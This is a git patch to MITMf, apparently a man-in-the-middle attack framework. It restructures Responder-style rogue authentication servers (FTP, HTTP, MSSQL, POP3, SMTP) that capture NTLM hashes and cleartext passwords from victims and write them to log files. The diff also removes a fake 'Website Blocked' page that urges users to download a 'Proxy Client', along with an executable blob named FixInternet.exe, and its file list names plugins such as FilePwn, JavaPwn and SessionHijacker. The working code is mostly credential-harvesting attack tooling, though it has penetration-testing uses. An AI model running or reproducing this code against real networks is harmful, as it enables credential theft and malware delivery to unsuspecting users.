-- core/responder/common.py | 2 +- .../{protocols => responder}/ftp/FTPServer.py | 48 +- core/{protocols => responder}/ftp/__init__.py | 0 .../http => responder/https}/HTTPSProxy.py | 0 .../http => responder/https}/__init__.py | 0 .../imap/IMAPPackets.py | 17 +- .../imap/IMAPServer.py | 39 +- .../{protocols => responder}/imap/__init__.py | 0 .../ldap/LDAPPackets.py | 18 +- .../ldap/LDAPServer.py | 52 +- .../{protocols => responder}/ldap/__init__.py | 0 .../mssql/MSSQLPackets.py | 17 +- core/responder/mssql/MSSQLServer.py | 127 ++++ .../mssql/__init__.py | 0 core/responder/pop3/POP3Server.py | 63 ++ .../{protocols => responder}/pop3/__init__.py | 0 .../smtp/SMTPPackets.py | 17 +- core/responder/smtp/SMTPServer.py | 62 ++ .../{protocols => responder}/smtp/__init__.py | 0 core/sergioproxy/ProxyPlugins.py | 2 +- core/sslstrip/ServerConnection.py | 2 +- libs/bdfactory | 2 +- mitmf.py | 9 +- plugins/AppCachePoison.py | 206 ++++++ plugins/BeefAutorun.py | 127 ++++ plugins/BrowserProfiler.py | 129 ++++ plugins/FilePwn.py | 650 ++++++++++++++++++ plugins/Inject.py | 55 +- plugins/JavaPwn.py | 231 +++++++ plugins/JsKeylogger.py | 4 +- plugins/Replace.py | 105 +++ plugins/Responder.py | 34 +- plugins/SSLstrip+.py | 51 ++ plugins/SessionHijacker.py | 187 +++++ plugins/Spoof.py | 2 - plugins/Upsidedownternet.py | 2 + 50 files changed, 2102 insertions(+), 798 deletions(-) delete mode 100644 config/responder/Denied.html delete mode 100755 config/responder/FixInternet.exe delete mode 100755 config/responder/certs/gen-self-signed-cert.sh delete mode 100644 config/responder/certs/responder.crt delete mode 100644 config/responder/certs/responder.key delete mode 100644 core/protocols/http/HTTPProxy.py delete mode 100644 core/protocols/mssql/MSSQLServer.py delete mode 100644 core/protocols/pop3/POP3Server.py delete mode 100644 core/protocols/smtp/SMTPServer.py rename core/{protocols => responder}/ftp/FTPServer.py (54%) rename core/{protocols => responder}/ftp/__init__.py (100%) rename core/{protocols/http => responder/https}/HTTPSProxy.py (100%) rename core/{protocols/http => responder/https}/__init__.py (100%) rename core/{protocols => responder}/imap/IMAPPackets.py (76%) rename core/{protocols => responder}/imap/IMAPServer.py (50%) rename core/{protocols => responder}/imap/__init__.py (100%) rename core/{protocols => responder}/ldap/LDAPPackets.py (97%) rename core/{protocols => responder}/ldap/LDAPServer.py (72%) rename core/{protocols => responder}/ldap/__init__.py (100%) rename core/{protocols => responder}/mssql/MSSQLPackets.py (96%) create mode 100644 core/responder/mssql/MSSQLServer.py rename core/{protocols => responder}/mssql/__init__.py (100%) create mode 100644 core/responder/pop3/POP3Server.py rename core/{protocols => responder}/pop3/__init__.py (100%) rename core/{protocols => responder}/smtp/SMTPPackets.py (81%) create mode 100644 core/responder/smtp/SMTPServer.py rename core/{protocols => responder}/smtp/__init__.py (100%) create mode 100644 plugins/AppCachePoison.py create mode 100644 plugins/BeefAutorun.py create mode 100644 plugins/BrowserProfiler.py create mode 100644 plugins/FilePwn.py create mode 100644 plugins/JavaPwn.py create mode 100644 plugins/Replace.py create mode 100644 plugins/SSLstrip+.py create mode 100644 plugins/SessionHijacker.py diff --git a/config/mitmf.conf b/config/mitmf.conf index 04bd575..c76f951 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -21,6 +21,10 @@ msfport = 8080 #Port to start webserver for exploits rpcip = 127.0.0.1 rpcpass = abc123 + + [[SMB]] + #Set a custom challenge + Challenge = 1122334455667788 [[DNS]] @@ -88,46 +92,32 @@ [Responder] #Set these values to On or Off, so you can control which rogue authentication server is turned on. - SQL = On - SMB = On + MSSQL = On Kerberos = On - FTP = On - POP = On - ##Listen on 25/TCP, 587/TCP - SMTP = On - IMAP = On - HTTP = On - HTTPS = On - LDAP = On + FTP = On + POP = On + SMTP = On #Listens on 25/TCP, 587/TCP + IMAP = On + LDAP = On - #Set a custom challenge - Challenge = 1122334455667788 - - #Set this to change the default logging file - SessionLog = Responder-Session.log - - #Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 - #RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 + #Set this option with your in-scope targets (default = All) + #Ex. RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 RespondTo = - #Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT - #RespondTo = WPAD,DEV,PROD,SQLINT + + #Set this option with specific NBT-NS/LLMNR names to answer to (default = All) + #Ex. RespondTo = WPAD,DEV,PROD,SQLINT RespondToName = #DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 DontRespondTo = - #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS + + #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None) + #Ex. DontRespondTo = NAC, IPS, IDS DontRespondToName = #Set your custom PAC script WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}' - [[HTTPS Server]] - - #Change to use your certs - cert = config/responder/certs/responder.crt - key = config/responder/certs/responder.key - - [BeEFAutorun] #Example config for the BeefAutorun plugin diff --git a/config/responder/Denied.html b/config/responder/Denied.html deleted file mode 100644 index d79f811..0000000 --- a/config/responder/Denied.html +++ /dev/null @@ -1,31 +0,0 @@ - - -Website Blocked: ISA Proxy Server - - - - -
-
-
New Security Policy: Website Blocked
-
    -
    -
    -
  • Access has been blocked. Please download and install the new Proxy Client in order to access internet resources.
  • -
    -
-
- -
- - - diff --git a/config/responder/FixInternet.exe b/config/responder/FixInternet.exe deleted file mode 100755 index b1a8e630176e120fc0f4f7af483880fb419d4937..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 25113 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 d%6Oe&n 24: - NthashLen = 64 - DomainLen = struct.unpack('2: - PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) - #print PostData - responder_logger.info(PostData) - -#Handle HTTP packet sequence. -def PacketSequence(data,client): - Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data) - BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data) - - if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data): - File = config.get('HTTP Server', 'ExecFilename') - buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File) - buffer1.calculate() - return str(buffer1) - - if ServeEXECAlwaysOrNot(Exec_Mode_On_Off): - if IsExecutable(FILENAME): - buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME) - buffer1.calculate() - return str(buffer1) - else: - buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME)) - buffer1.calculate() - return str(buffer1) - - if Ntlm: - packetNtlm = b64decode(''.join(Ntlm))[8:9] - if packetNtlm == "\x01": - GrabURL(data,client) - GrabCookie(data,client) - r = NTLM_Challenge(ServerChallenge=Challenge) - r.calculate() - t = IIS_NTLM_Challenge_Ans() - t.calculate(str(r)) - buffer1 = str(t) - return buffer1 - if packetNtlm == "\x03": - NTLM_Auth= b64decode(''.join(Ntlm)) - ParseHTTPHash(NTLM_Auth,client) - if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "[+]WPAD (auth) file sent to: %s"%(client) - if Verbose: - print Message - responder_logger.info(Message) - buffer1 = WpadCustom(data,client) - return buffer1 - else: - buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) - buffer1.calculate() - return str(buffer1) - - if BasicAuth: - GrabCookie(data,client) - GrabURL(data,client) - outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt" - WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) - responder_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) - if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "[+]WPAD (auth) file sent to: %s"%(client) - if Verbose: - print Message - responder_logger.info(Message) - buffer1 = WpadCustom(data,client) - return buffer1 - else: - buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) - buffer1.calculate() - return str(buffer1) - - else: - return str(Basic_Ntlm(Basic)) - -#HTTP Server Class -class HTTP(BaseRequestHandler): - - def handle(self): - try: - while True: - self.request.settimeout(1) - data = self.request.recv(8092) - buff = WpadCustom(data,self.client_address[0]) - if buff and WpadForcedAuth(Force_WPAD_Auth) == False: - Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) - if Verbose: - print Message - responder_logger.info(Message) - self.request.send(buff) - else: - buffer0 = PacketSequence(data,self.client_address[0]) - self.request.send(buffer0) - except Exception: - pass#No need to be verbose.. - \ No newline at end of file diff --git a/core/protocols/mssql/MSSQLServer.py b/core/protocols/mssql/MSSQLServer.py deleted file mode 100644 index 60d7adb..0000000 --- a/core/protocols/mssql/MSSQLServer.py +++ /dev/null @@ -1,128 +0,0 @@ -import struct - -class MSSQLServer(): - - def serve_thread_tcp(host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - def start(SQL_On_Off): - if SQL_On_Off == "ON": - t = threading.Thread(name="MSSQL", target=self.serve_thread_tcp, args=("0.0.0.0", 1433,MSSQL)) - t.setDaemon(True) - t.start() - return t - if SQL_On_Off == "OFF": - return False - -class ThreadingTCPServer(ThreadingMixIn, TCPServer): - - allow_reuse_address = True - - def server_bind(self): - TCPServer.server_bind(self) - -#This function parse SQL NTLMv1/v2 hash and dump it into a specific file. -def ParseSQLHash(data,client): - SSPIStart = data[8:] - LMhashLen = struct.unpack(' 60: - DomainLen = struct.unpack('H',Data[2:4])[0] - EncryptionValue = Data[PacketLen-7:PacketLen-6] - if re.search("NTLMSSP",Data): - return True - else: - return False - -#MS-SQL server class. -class MSSQL(BaseRequestHandler): - - def handle(self): - try: - while True: - data = self.request.recv(1024) - self.request.settimeout(0.1) - ##Pre-Login Message - if data[0] == "\x12": - buffer0 = str(MSSQLPreLoginAnswer()) - self.request.send(buffer0) - data = self.request.recv(1024) - ##NegoSSP - if data[0] == "\x10": - if re.search("NTLMSSP",data): - t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge) - t.calculate() - buffer1 = str(t) - self.request.send(buffer1) - data = self.request.recv(1024) - else: - ParseClearTextSQLPass(data,self.client_address[0]) - ##NegoSSP Auth - if data[0] == "\x11": - ParseSQLHash(data,self.client_address[0]) - except Exception: - pass - self.request.close() -################################################################################## -#SQL Stuff ends here -################################################################################## \ No newline at end of file diff --git a/core/protocols/pop3/POP3Server.py b/core/protocols/pop3/POP3Server.py deleted file mode 100644 index 8e7d700..0000000 --- a/core/protocols/pop3/POP3Server.py +++ /dev/null @@ -1,69 +0,0 @@ -################################################################################## -#POP3 Stuff starts here -################################################################################## - -class POP3Server(): - - def serve_thread_tcp(host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - #Function name self-explanatory - def start(POP_On_Off): - if POP_On_Off == "ON": - t = threading.Thread(name="POP", target=serve_thread_tcp, args=("0.0.0.0", 110,POP)) - t.setDaemon(True) - t.start() - return t - if POP_On_Off == "OFF": - return False - -class ThreadingTCPServer(ThreadingMixIn, TCPServer): - - allow_reuse_address = 1 - - def server_bind(self): - TCPServer.server_bind(self) - - -class POPOKPacket(Packet): - fields = OrderedDict([ - ("Code", "+OK"), - ("CRLF", "\r\n"), - ]) - -#POP3 server class. -class POP(BaseRequestHandler): - - def handle(self): - try: - self.request.send(str(POPOKPacket())) - data = self.request.recv(1024) - if data[0:4] == "USER": - User = data[5:].replace("\r\n","") - responder_logger.info('[+]POP3 User: %s'%(User)) - t = POPOKPacket() - self.request.send(str(t)) - data = self.request.recv(1024) - if data[0:4] == "PASS": - Pass = data[5:].replace("\r\n","") - Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt" - WriteData(Outfile,User+":"+Pass, User+":"+Pass) - #print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass) - responder_logger.info("[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)) - t = POPOKPacket() - self.request.send(str(t)) - data = self.request.recv(1024) - else : - t = POPOKPacket() - self.request.send(str(t)) - data = self.request.recv(1024) - except Exception: - pass - -################################################################################## -#POP3 Stuff ends here -################################################################################## \ No newline at end of file diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py index 57c5cb3..ded9958 100644 --- a/core/protocols/smb/SMBserver.py +++ b/core/protocols/smb/SMBserver.py @@ -1,7 +1,8 @@ import logging import sys import threading -from impacket import smbserver, LOG +from impacket import version, smbserver, LOG +from core.configwatcher import ConfigWatcher LOG.setLevel(logging.INFO) LOG.propagate = False @@ -16,11 +17,14 @@ streamHandler.setFormatter(formatter) LOG.addHandler(fileHandler) LOG.addHandler(streamHandler) -class SMBserver: +class SMBserver(ConfigWatcher): + + impacket_ver = version.VER_MINOR def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''): self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile) + self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"]) def start(self): t = threading.Thread(name='SMBserver', target=self.server.start) diff --git a/core/protocols/smtp/SMTPServer.py b/core/protocols/smtp/SMTPServer.py deleted file mode 100644 index 50002f9..0000000 --- a/core/protocols/smtp/SMTPServer.py +++ /dev/null @@ -1,63 +0,0 @@ -################################################################################## -#ESMTP Stuff starts here -################################################################################## - -class SMTP(): - - def serve_thread_tcp(self, host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - #Function name self-explanatory - def start(self, SMTP_On_Off): - if SMTP_On_Off == "ON": - t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=("0.0.0.0", 25,ESMTP)) - t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=("0.0.0.0", 587,ESMTP)) - - for t in [t1, t2]: - t.setDaemon(True) - t.start() - - if SMTP_On_Off == "OFF": - return False - -class ThreadingTCPServer(ThreadingMixIn, TCPServer): - - allow_reuse_address = 1 - - def server_bind(self): - TCPServer.server_bind(self) - -#ESMTP server class. -class ESMTP(BaseRequestHandler): - - def handle(self): - try: - self.request.send(str(SMTPGreating())) - data = self.request.recv(1024) - if data[0:4] == "EHLO": - self.request.send(str(SMTPAUTH())) - data = self.request.recv(1024) - if data[0:4] == "AUTH": - self.request.send(str(SMTPAUTH1())) - data = self.request.recv(1024) - if data: - Username = b64decode(data[:len(data)-2]) - self.request.send(str(SMTPAUTH2())) - data = self.request.recv(1024) - if data: - Password = b64decode(data[:len(data)-2]) - Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt" - WriteData(Outfile,Username+":"+Password, Username+":"+Password) - #print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password) - responder_logger.info("[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)) - - except Exception: - pass - -################################################################################## -#ESMTP Stuff ends here -################################################################################## \ No newline at end of file diff --git a/core/responder/common.py b/core/responder/common.py index cd0ea40..904d865 100644 --- a/core/responder/common.py +++ b/core/responder/common.py @@ -1,6 +1,6 @@ #common functions that are used throughout the Responder's code - +import os import re #Function used to write captured hashs to a file. diff --git a/core/protocols/ftp/FTPServer.py b/core/responder/ftp/FTPServer.py similarity index 54% rename from core/protocols/ftp/FTPServer.py rename to core/responder/ftp/FTPServer.py index 98d65ae..d045568 100644 --- a/core/protocols/ftp/FTPServer.py +++ b/core/responder/ftp/FTPServer.py @@ -1,25 +1,25 @@ -################################################################################## -#FTP Stuff starts here -################################################################################## +import socket +import threading +import logging + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from core.responder.packet import Packet +from core.responder.odict import OrderedDict +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class FTPServer(): - - def serve_thread_tcp(host, port, handler): + + def start(self): try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - #Function name self-explanatory - def start(FTP_On_Off): - if FTP_On_Off == "ON": - t = threading.Thread(name="FTP", target=self.serve_thread_tcp, args=("0.0.0.0", 21, FTP)) + mitmf_logger.debug("[FTPServer] online") + server = ThreadingTCPServer(("0.0.0.0", 21), FTP) + t = threading.Thread(name="FTPServer", target=server.serve_forever) t.setDaemon(True) t.start() - - if FTP_On_Off == "OFF": - return False + except Exception, e: + mitmf_logger.error("[FTPServer] Error starting on port {}: {}".format(21, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): @@ -45,8 +45,7 @@ class FTP(BaseRequestHandler): data = self.request.recv(1024) if data[0:4] == "USER": User = data[5:].replace("\r\n","") - #print "[+]FTP User: ", User - responder_logger.info('[+]FTP User: %s'%(User)) + mitmf_logger.info('[FTPServer] {} FTP User: {}'.format(self.client_address[0], User)) t = FTPPacket(Code="331",Message="User name okay, need password.") self.request.send(str(t)) data = self.request.recv(1024) @@ -54,8 +53,7 @@ class FTP(BaseRequestHandler): Pass = data[5:].replace("\r\n","") Outfile = "./logs/responder/FTP-Clear-Text-Password-"+self.client_address[0]+".txt" WriteData(Outfile,User+":"+Pass, User+":"+Pass) - #print "[+]FTP Password is: ", Pass - responder_logger.info('[+]FTP Password is: %s'%(Pass)) + mitmf_logger.info('[FTPServer] {} FTP Password is: {}'.format(self.client_address[0], Pass)) t = FTPPacket(Code="530",Message="User not logged in.") self.request.send(str(t)) data = self.request.recv(1024) @@ -63,9 +61,5 @@ class FTP(BaseRequestHandler): t = FTPPacket(Code="502",Message="Command not implemented.") self.request.send(str(t)) data = self.request.recv(1024) - except Exception: - pass - -################################################################################## -#FTP Stuff ends here -################################################################################## \ No newline at end of file + except Exception as e: + mitmf_logger.error("[FTPServer] Error handling request: {}".format(e)) \ No newline at end of file diff --git a/core/protocols/ftp/__init__.py b/core/responder/ftp/__init__.py similarity index 100% rename from core/protocols/ftp/__init__.py rename to core/responder/ftp/__init__.py diff --git a/core/protocols/http/HTTPSProxy.py b/core/responder/https/HTTPSProxy.py similarity index 100% rename from core/protocols/http/HTTPSProxy.py rename to core/responder/https/HTTPSProxy.py diff --git a/core/protocols/http/__init__.py 